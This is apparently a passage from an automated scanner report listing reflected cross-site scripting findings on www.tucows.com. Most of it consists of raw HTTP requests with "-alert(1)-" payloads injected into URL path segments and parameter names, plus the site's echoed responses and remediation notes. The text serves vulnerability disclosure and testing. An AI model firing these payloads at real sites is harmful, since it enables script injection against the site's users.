GET /images/newassets/includesdc3ab"-alert(1)-"412e4b918b2/themes/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:25 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16ea9"-alert(1)-"fa1a0931a13 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes16ea9"-alert(1)-"fa1a0931a13/03BlueMeany/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5393"-alert(1)-"cb3cdfe4732 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeanyd5393"-alert(1)-"cb3cdfe4732/styles.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:46 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6aa0e"-alert(1)-"a1b4df2075b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/styles.css6aa0e"-alert(1)-"a1b4df2075b HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:56 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload acf37"-alert(1)-"829dd6d7186 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/themes/03BlueMeany/styles.css?acf37"-alert(1)-"829dd6d7186=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:25:55 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f522"-alert(1)-"246c1c75e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images7f522"-alert(1)-"246c1c75e2/newassets/javascript:void(null) HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:34 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3c15"-alert(1)-"6e3e5a56f01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsc3c15"-alert(1)-"6e3e5a56f01/javascript:void(null) HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:54 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1045a"-alert(1)-"0b7ffb9ae62 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/javascript:void(null)1045a"-alert(1)-"0b7ffb9ae62 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:29:09 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.84. http://www.tucows.com/images/newassets/javascript:void(null) [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/javascript:void(null)
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55e7b"-alert(1)-"e4c6b9e0aae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/javascript:void(null)?55e7b"-alert(1)-"e4c6b9e0aae=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:28:01 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8030"-alert(1)-"d2a10cd4b2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagesb8030"-alert(1)-"d2a10cd4b2f/newassets/lostpass.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2408f"-alert(1)-"745fc17afdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets2408f"-alert(1)-"745fc17afdb/lostpass.html HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:54 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f369"-alert(1)-"1c6dab942a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/lostpass.html3f369"-alert(1)-"1c6dab942a HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
1.88. http://www.tucows.com/images/newassets/lostpass.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tucows.com
Path:
/images/newassets/lostpass.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10cdc"-alert(1)-"bef9c960c47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/lostpass.html?10cdc"-alert(1)-"bef9c960c47=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
